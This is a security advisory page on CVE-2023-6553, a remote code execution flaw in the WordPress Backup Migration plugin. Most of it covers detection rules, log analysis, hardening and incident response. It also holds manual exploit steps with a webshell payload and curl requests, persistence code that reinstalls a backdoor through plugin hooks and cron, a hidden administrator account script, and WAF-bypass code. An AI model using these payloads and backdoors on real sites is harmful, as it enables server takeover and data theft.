Sample Output:

[+] Target: https://target.com
[+] Vulnerable endpoint found: backup-heart.php
[+] Generating PHP filter chain payload...
[+] Payload size: 8192 bytes
[+] Sending exploit request...
[+] Success! Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Remote code execution successful!

Manual Exploitation Steps

Step 1: Generate PHP Filter Chain

Use the PHP filter chain generator to create payload:

from php_filter_chain_generator import generate_payload

# Simple web shell
webshell = '<?php system($_GET["c"]); ?>'
filter_chain = generate_payload(webshell)

Step 2: Craft HTTP Request

POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|[...LONG_FILTER_CHAIN...]/resource=php://temp
Content-Length: 0

Step 3: Write Persistent Backdoor

# Character-by-character write to avoid size limits
for char in '<?php system($_GET["cmd"]); ?>'; do
    curl -X POST https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php \
    -H "Content-Dir: [filter_chain_for_single_char]"
done

# Copy to accessible location
curl -X POST https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php \
-H "Content-Dir: [filter_chain_for_copy_command]"

Step 4: Execute Backdoor

# Execute commands via webshell
curl "https://target.com/wp-content/plugins/backup-backup/includes/backdoor.php?cmd=whoami"

Impact Assessment

Critical Risks

Complete Server Compromise: Attackers gain arbitrary code execution with web server privileges (typically www-data or apache), allowing full control over the WordPress installation and potentially the entire server.
Data Breach: Access to all WordPress data including user credentials, customer information, payment details, and proprietary content stored in the database.
Lateral Movement: Compromised server can be used as pivot point to attack internal network infrastructure, other servers, and backend systems.
Website Defacement: Attackers can modify website content, inject malicious scripts, or completely replace the site with attacker-controlled content.
Malware Distribution: Server can be weaponized to serve malware, exploit kits, or participate in phishing campaigns targeting website visitors.
Cryptomining: Installation of cryptocurrency miners consuming server resources and increasing operational costs.
Backdoor Persistence: Attackers can establish multiple persistence mechanisms making remediation difficult and enabling re-compromise.
SEO Poisoning: Injection of spam links and content to manipulate search engine rankings for malicious purposes.
Supply Chain Attack: Compromised WordPress sites can be used to attack plugins, themes, or update mechanisms affecting downstream users.
Regulatory Compliance Violation: Data breaches resulting from exploitation may trigger GDPR, PCI-DSS, HIPAA, or other regulatory penalties.

CVSS v3.1 Score

Base Score: 9.8 (Critical)

Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV): Network - Exploitable remotely over the network
Attack Complexity (AC): Low - No special conditions required
Privileges Required (PR): None - No authentication needed
User Interaction (UI): None - Fully automated exploitation
Scope (S): Unchanged - Exploited component and impacted component are the same
Confidentiality (C): High - Complete disclosure of all files and data
Integrity (I): High - Complete modification of all system files
Availability (A): High - Complete denial of service or system shutdown

Detection Methods

Network-Based Detection

IDS/IPS Signatures:

alert http any any -> any any (msg:"CVE-2023-6553 WordPress Backup Migration RCE Attempt"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/wp-content/plugins/backup-backup/includes/backup-heart.php"; http_uri; \
  content:"Content-Dir"; http_header; \
  content:"php://filter"; http_header; \
  content:"convert.iconv"; http_header; \
  classtype:web-application-attack; \
  sid:20236553; rev:1;)

Suricata Rule:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT WordPress Backup Migration RCE CVE-2023-6553"; \
  flow:established,to_server; \
  http.method; content:"POST"; \
  http.uri; content:"/backup-heart.php"; \
  http.header; content:"Content-Dir"; \
  http.header; content:"php://filter/convert"; \
  reference:cve,2023-6553; \
  classtype:web-application-attack; \
  sid:2023655301; rev:1;)

Web Application Firewall (WAF) Rules

ModSecurity Rule:

SecRule REQUEST_HEADERS:Content-Dir "@rx php://filter.*convert\.iconv" \
    "id:9006553, \
    phase:1, \
    deny, \
    status:403, \
    log, \
    msg:'CVE-2023-6553 - WordPress Backup Migration RCE Attempt', \
    tag:'application-multi', \
    tag:'language-php', \
    tag:'platform-wordpress', \
    tag:'attack-rce', \
    tag:'OWASP_CRS', \
    tag:'capec/1000/152/242', \
    tag:'CVE-2023-6553'"

Nginx/WAF Configuration:

location ~ /wp-content/plugins/backup-backup/includes/backup-heart\.php$ {
    if ($http_content_dir ~* "php://filter") {
        return 403;
    }
    if ($http_content_dir ~* "convert\.iconv") {
        return 403;
    }
}

Log Analysis

Apache/Nginx Access Log Patterns:

# Search for exploitation attempts
grep -E "backup-heart\.php.*Content-Dir.*php://filter" /var/log/apache2/access.log

# Look for suspicious POST requests
awk '$6 == "POST" && $7 ~ /backup-heart\.php/ {print}' /var/log/nginx/access.log

# Find requests with PHP filter chains
grep "convert.iconv" /var/log/apache2/access.log | grep "backup-backup"

WordPress Debug Log Monitoring:

# Check for suspicious file operations
grep -E "(fwrite|fopen|copy|file_put_contents)" /var/www/html/wp-content/debug.log

# Monitor for unusual require/include statements
grep -E "(require|include).*php://filter" /var/www/html/wp-content/debug.log

File System Monitoring

OSSEC/Wazuh Rules:

<rule id="100553" level="12">
  <if_sid>550</if_sid>
  <match>wp-content/plugins/backup-backup/includes</match>
  <regex>\.php$</regex>
  <description>CVE-2023-6553: Suspicious PHP file creation in Backup Migration plugin directory</description>
  <group>wordpress,web,attack,cve-2023-6553</group>
</rule>

File Integrity Monitoring:

# Monitor plugin directory for unauthorized changes
inotifywait -m -r -e create,modify /var/www/html/wp-content/plugins/backup-backup/includes/ \
  --format '%T %w%f %e' --timefmt '%Y-%m-%d %H:%M:%S'

# Check for new PHP files
find /var/www/html/wp-content/plugins/backup-backup/includes/ -name "*.php" -mtime -1

Runtime Detection

PHP-FPM Monitoring:

# Monitor for suspicious process behavior
ps aux | grep php-fpm | grep -E "(system|exec|shell_exec|passthru)"

# Check for unusual network connections from PHP processes
lsof -i -n | grep php-fpm | grep ESTABLISHED

WordPress Security Plugins:

Wordfence: Detects malicious file uploads and code execution attempts
Sucuri Security: Real-time malware scanning and firewall
iThemes Security: Blocks suspicious requests and monitors file changes

Mitigation & Remediation

Immediate Emergency Response

Step 1: Isolate Compromised System

# Block all traffic to WordPress admin (if under attack)
iptables -A INPUT -p tcp --dport 80 -m string --string "/wp-admin" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 443 -m string --string "/wp-admin" --algo bm -j DROP

# Block vulnerable endpoint specifically
location ~ /wp-content/plugins/backup-backup/includes/backup-heart\.php$ {
    deny all;
}

Step 2: Disable Vulnerable Plugin

# Via WP-CLI
wp plugin deactivate backup-backup

# Via file system (if admin access compromised)
mv /var/www/html/wp-content/plugins/backup-backup \
   /var/www/html/wp-content/plugins/backup-backup.disabled

# Or rename the vulnerable file
mv /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php \
   /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php.bak

Step 3: Search for Indicators of Compromise

# Find recently modified files
find /var/www/html/wp-content/plugins/backup-backup/ -type f -mtime -7 -ls

# Search for webshells
grep -r "system\|passthru\|shell_exec\|eval\|base64_decode" \
  /var/www/html/wp-content/plugins/backup-backup/includes/

# Look for suspicious PHP files
find /var/www/html/wp-content/plugins/backup-backup/includes/ \
  -name "*.php" ! -name "backup-heart.php" ! -name "*.original.php"

# Check for backdoor accounts
wp user list --role=administrator --format=table

Step 4: Remove Artifacts

# Delete suspicious files (verify before deletion)
find /var/www/html/wp-content/plugins/backup-backup/includes/ \
  -name "*.php" -mtime -7 -delete

# Remove common webshell names
rm -f /var/www/html/wp-content/plugins/backup-backup/includes/{shell,c99,r57,b374k}.php
rm -f /var/www/html/wp-content/plugins/backup-backup/includes/[a-z].php

Vendor Patch Installation

Update to Secure Version:

# Update via WordPress admin dashboard
# Navigate to: Plugins → Installed Plugins → Backup Migration → Update

# Update via WP-CLI
wp plugin update backup-backup

# Verify patch installation
wp plugin list | grep backup-backup
# Should show version > 1.3.7 (patched version is 1.3.8+)

# Alternative: Remove and reinstall
wp plugin delete backup-backup
wp plugin install backup-backup --activate

Verify Patch Effectiveness:

# Check if vulnerable file still exists
test -f /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php \
  && echo "Still vulnerable" || echo "Patched"

# Verify plugin version
grep "Version:" /var/www/html/wp-content/plugins/backup-backup/backup-backup.php

Defense-in-Depth Hardening

1. Web Application Firewall Configuration

Deploy WAF rules to block PHP filter chain attacks:

# ModSecurity - Block PHP wrappers
SecRule REQUEST_HEADERS "@rx php://(filter|input|output|fd|memory|temp)" \
    "id:9006554,phase:1,deny,status:403,msg:'Blocked PHP wrapper usage'"

# Block base64 in headers
SecRule REQUEST_HEADERS "@rx base64" \
    "id:9006555,phase:1,deny,status:403,msg:'Blocked base64 in headers'"

2. PHP Security Hardening

; /etc/php/8.1/fpm/php.ini

; Disable dangerous functions
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

; Restrict file operations
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /var/www/html:/tmp

; Enable strict error reporting
display_errors = Off
log_errors = On
error_log = /var/log/php-fpm/error.log

3. WordPress Security Best Practices

// wp-config.php security enhancements

// Disable file editing from admin panel
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);

// Force SSL for admin
define('FORCE_SSL_ADMIN', true);

// Security keys (generate unique keys)
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');

// Limit login attempts
define('LIMIT_LOGIN_ATTEMPTS', true);

4. File Permission Hardening

# Set correct ownership
chown -R www-data:www-data /var/www/html/wp-content/plugins/

# Restrict permissions
find /var/www/html/wp-content/plugins/ -type d -exec chmod 755 {} \;
find /var/www/html/wp-content/plugins/ -type f -exec chmod 644 {} \;

# Make backup-heart.php read-only (after patching)
chmod 444 /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php
chattr +i /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php

5. Network Segmentation

# Restrict plugin directory access to local only
<Directory /var/www/html/wp-content/plugins/backup-backup/includes>
    Require ip 127.0.0.1
    Require ip ::1
</Directory>

# Or use IP whitelisting
<Directory /var/www/html/wp-content/plugins/backup-backup/includes>
    Require ip 10.0.0.0/8
    Require ip 192.168.0.0/16
</Directory>

6. Runtime Application Self-Protection (RASP)

Deploy RASP solutions to detect and block exploit attempts in real-time:

# Install and configure mod_security
apt-get install libapache2-mod-security2
a2enmod security2

# Enable OWASP Core Rule Set
cd /etc/modsecurity
git clone https://github.com/coreruleset/coreruleset
cp coreruleset/crs-setup.conf.example coreruleset/crs-setup.conf

Monitoring and Continuous Protection

1. Implement Security Monitoring

# Deploy Fail2Ban jail for WordPress
cat >> /etc/fail2ban/jail.local << EOF
[wordpress-rce]
enabled = true
filter = wordpress-rce
action = iptables-multiport[name=WordPressRCE, port="http,https"]
logpath = /var/log/apache2/access.log
maxretry = 1
bantime = 86400
EOF

# Create filter
cat > /etc/fail2ban/filter.d/wordpress-rce.conf << EOF
[Definition]
failregex = ^<HOST>.*POST.*backup-heart\.php.*Content-Dir.*php://filter
ignoreregex =
EOF

systemctl restart fail2ban

2. Automated Vulnerability Scanning

# Use WPScan for continuous monitoring
wpscan --url https://target.com --enumerate vp --api-token YOUR_API_TOKEN

# Schedule daily scans
crontab -e
0 2 * * * /usr/local/bin/wpscan --url https://target.com --enumerate vp --email admin@target.com

3. Security Information and Event Management (SIEM)

Configure log forwarding to SIEM:

# Rsyslog configuration for centralized logging
cat >> /etc/rsyslog.d/50-wordpress.conf << EOF
:programname, isequal, "apache2" @@siem-server:514
:programname, isequal, "php-fpm" @@siem-server:514
EOF

systemctl restart rsyslog

Incident Response Playbook

Phase 1: Detection and Analysis

# 1. Confirm exploitation
grep -r "php://filter.*convert.iconv" /var/log/apache2/access.log

# 2. Identify attacker IP addresses
awk '/backup-heart\.php/ && /Content-Dir/ {print $1}' /var/log/apache2/access.log | sort -u

# 3. Timeline analysis
grep "backup-heart.php" /var/log/apache2/access.log | \
  awk '{print $4, $5, $1}' | sort

# 4. Check for data exfiltration
netstat -tnp | grep ESTABLISHED | grep www-data

Phase 2: Containment

# 1. Block attacker IPs
for ip in $(cat attacker_ips.txt); do
    iptables -A INPUT -s $ip -j DROP
done

# 2. Disable vulnerable component
mv /var/www/html/wp-content/plugins/backup-backup \
   /root/evidence/backup-backup.$(date +%Y%m%d)

# 3. Terminate suspicious processes
pkill -9 -u www-data php-fpm

# 4. Enable maintenance mode
wp maintenance-mode activate

Phase 3: Eradication

# 1. Full malware scan
clamscan -r --infected --remove /var/www/html/

# 2. Database cleanup
wp db query "DELETE FROM wp_users WHERE user_login LIKE '%admin%' AND ID > 1000"
wp db query "DELETE FROM wp_options WHERE option_name = '_transient_suspicious_key'"

# 3. Remove backdoors
find /var/www/html -name "*.php" -exec grep -l "eval\|base64_decode\|system" {} \; | \
  xargs -I {} rm -f {}

# 4. Restore from clean backup (if available)
wp db import clean_backup.sql

Phase 4: Recovery

# 1. Update all components
wp plugin update --all
wp theme update --all
wp core update

# 2. Reset all passwords
wp user list --format=ids | xargs -I {} wp user update {} --user_pass=$(openssl rand -base64 32)

# 3. Regenerate security keys
curl -s https://api.wordpress.org/secret-key/1.1/salt/ >> wp-config.php

# 4. Disable maintenance mode
wp maintenance-mode deactivate

Phase 5: Lessons Learned

# Document incident
cat > incident_report_cve_2023_6553.txt << EOF
Incident: CVE-2023-6553 WordPress Backup Migration RCE
Date: $(date)
Affected System: target.com
Attack Vector: Unauthenticated RCE via PHP filter chain
Impact: [Document actual impact]
Root Cause: Vulnerable plugin version 1.3.7
Remediation: Updated to version 1.3.8, implemented WAF rules
Lessons Learned: [Document key takeaways]
EOF

Advanced Exploitation Techniques

Technique 1: Bypassing WAF Restrictions

# Obfuscate filter chains to evade signature detection
def obfuscate_filter_chain(payload):
    # Use alternative encoding combinations
    encodings = [
        'convert.iconv.UTF-8.UTF-16LE',
        'convert.iconv.ISO-8859-1.UTF-16',
        'convert.iconv.WINDOWS-1252.UTF-32BE'
    ]
    # Randomly select and chain encodings
    return generate_payload(payload, custom_encodings=encodings)

Technique 2: Persistence Mechanisms

// Implant persistent backdoor
<?php
// Auto-reinstall on plugin update
add_filter('upgrader_post_install', function($true, $hook_extra, $result) {
    file_put_contents(__DIR__ . '/backdoor.php', base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg=='));
    return $true;
}, 10, 3);

// Cron-based persistence
if (!wp_next_scheduled('backdoor_maintain')) {
    wp_schedule_event(time(), 'hourly', 'backdoor_maintain');
}
add_action('backdoor_maintain', function() {
    if (!file_exists(__DIR__ . '/backdoor.php')) {
        file_put_contents(__DIR__ . '/backdoor.php', '<?php system($_GET["c"]); ?>');
    }
});
?>

Technique 3: Privilege Escalation

// Create hidden admin account
<?php
$username = 'sysupdate';
$password = wp_generate_password(32, true, true);
$email = 'sysupdate@localhost.local';

if (!username_exists($username) && !email_exists($email)) {
    $user_id = wp_create_user($username, $password, $email);
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    
    // Hide from user list
    update_user_meta($user_id, 'show_admin_bar_front', 'false');
    update_user_meta($user_id, 'hidden_admin', 1);
}
?>

Timeline

2023-12-11: Vulnerability discovered by Nex Team
2023-12-11: Public disclosure and PoC release
2023-12-11: CVE-2023-6553 assigned
2023-12-12: Vendor (BackupBliss) notified
2023-12-15: Patch released in version 1.3.8
2023-12-18: Metasploit module published by jheysel-r7
2024-01-05: Active exploitation observed in the wild
2025-10-27: Continued exploitation attempts documented

References

Official Advisories

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-6553
WordPress Plugin Repository: https://wordpress.org/plugins/backup-backup/
WPScan Vulnerability Database: https://wpscan.com/vulnerability/6a4d0af9-e1cd-4a69-a56c-3c009e207eca

Technical Resources

PHP Filter Chain Technique: https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it
Original PoC: https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py
Metasploit Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_backup_migration_rce.rb
PHP Stream Filters Documentation: https://www.php.net/manual/en/filters.php

Security Research

Synacktiv: PHP Filter Chains Research Paper
Ambionics Security: PHP Filter Chain Generator
RIPS Technologies: PHP Unsafe File Operation Analysis

Credits

Appendix A: PHP Filter Chain Generator

#!/usr/bin/env python3
"""
PHP Filter Chain Generator for CVE-2023-6553
Generates filter chain payloads for arbitrary PHP code execution
"""

import base64
from urllib.parse import quote

def generate_php_filter_payload(php_code):
    """
    Generate PHP filter chain for given PHP code
    Args:
        php_code: PHP code to execute (e.g., '<?php system("id"); ?>')
    Returns:
        Complete filter chain string for Content-Dir header
    """
    # Base64 encode the payload
    encoded = base64.b64encode(php_code.encode()).decode()
    
    # Build filter chain (simplified example)
    filters = [
        'convert.iconv.UTF8.CSISO2022KR',
        'convert.base64-encode',
        'convert.iconv.UTF8.UTF7',
        'convert.iconv.UTF8.UTF16',
        'convert.iconv.WINDOWS-1258.UTF32LE',
        'convert.iconv.ISIRI3342.ISO-IR-157',
        'convert.base64-decode',
        'convert.base64-encode'
    ]
    
    # Construct the full filter chain
    filter_chain = 'php://filter/'
    filter_chain += '|'.join(filters)
    filter_chain += '/resource=php://temp'
    
    return filter_chain

# Example usage
if __name__ == '__main__':
    payload = '<?php system($_GET["cmd"]); ?>'
    print(generate_php_filter_payload(payload))

Appendix B: Detection Signatures

Snort Rules

alert tcp any any -> any $HTTP_PORTS (msg:"CVE-2023-6553 WordPress Backup Migration RCE"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/backup-backup/includes/backup-heart.php"; http_uri; \
  content:"Content-Dir"; http_header; \
  pcre:"/php:\/\/filter.*convert\.iconv/Hi"; \
  reference:cve,2023-6553; \
  classtype:web-application-attack; \
  sid:20236553; \
  rev:2;)

YARA Rules

rule CVE_2023_6553_WordPress_Backup_Migration_RCE {
    meta:
        description = "Detects CVE-2023-6553 exploitation attempts"
        author = "Security Team"
        date = "2023-12-11"
        reference = "CVE-2023-6553"
        
    strings:
        $header = "Content-Dir" nocase
        $filter = "php://filter" nocase
        $iconv = "convert.iconv" nocase
        $endpoint = "/backup-backup/includes/backup-heart.php"
        $base64 = "base64-encode" nocase
        
    condition:
        all of them
}

Appendix C: Forensic Artifacts

Common Webshell Locations

/wp-content/plugins/backup-backup/includes/shell.php
/wp-content/plugins/backup-backup/includes/x.php
/wp-content/plugins/backup-backup/includes/[a-z].php
/wp-content/plugins/backup-backup/includes/backdoor.php
/wp-content/plugins/backup-backup/includes/[random4chars].php

Suspicious Log Entries

POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode...
User-Agent: python-requests/2.31.0

CATEGORY	Vulnerabilities
PUBLISHED	December 11, 2023
AUTHOR	Prepared by: LAYERWEB Security Team
READ TIME	17 MIN

CATEGORY	Vulnerabilities
PUBLISHED	December 11, 2023
AUTHOR	Prepared by: LAYERWEB Security Team
READ TIME	17 MIN

CVE-2023-6553 - WordPress Backup Migration Plugin Remote Code Execution

VULNERABILITY INFO

TAGS

SHARE

Vulnerability Overview

Affected Component

Technical Details

Vulnerability Mechanism

PHP Filter Chain Technique

Attack Flow

Root Cause Analysis

Exploitation

Prerequisites

Attack Scenario

Proof of Concept (PoC) / Exploit

Metasploit Module

Python PoC

Manual Exploitation Steps

Impact Assessment

Critical Risks

CVSS v3.1 Score

Detection Methods

Network-Based Detection

Web Application Firewall (WAF) Rules

Log Analysis

File System Monitoring

Runtime Detection

Mitigation & Remediation

Immediate Emergency Response

Vendor Patch Installation

Defense-in-Depth Hardening

Monitoring and Continuous Protection

Incident Response Playbook

Phase 1: Detection and Analysis

Phase 2: Containment

Phase 3: Eradication

Phase 4: Recovery

Phase 5: Lessons Learned

Advanced Exploitation Techniques

Technique 1: Bypassing WAF Restrictions

Technique 2: Persistence Mechanisms

Technique 3: Privilege Escalation

Timeline

References

Official Advisories

Technical Resources

Security Research

Credits

Appendix A: PHP Filter Chain Generator

Appendix B: Detection Signatures

Snort Rules

YARA Rules

Appendix C: Forensic Artifacts

Common Webshell Locations

Suspicious Log Entries

RELATED VULNERABILITIES

CVE-2023-44487 - HTTP/2 Rapid Reset Denial of Service

CVE-2025-41228 - VMware vSphere Client 8.0.3.0 XSS

CVE-2023-43320 Proxmox VE - TOTP Brute Force

Need Professional Security Audit?

CVE-2023-6553 - WordPress Backup Migration Plugin Remote Code Execution

VULNERABILITY INFO

TAGS

SHARE

Vulnerability Overview

Affected Component

Technical Details

Vulnerability Mechanism

PHP Filter Chain Technique

Attack Flow

Root Cause Analysis

Exploitation

Prerequisites

Attack Scenario

Proof of Concept (PoC) / Exploit

Metasploit Module

Python PoC

Manual Exploitation Steps

Impact Assessment

Critical Risks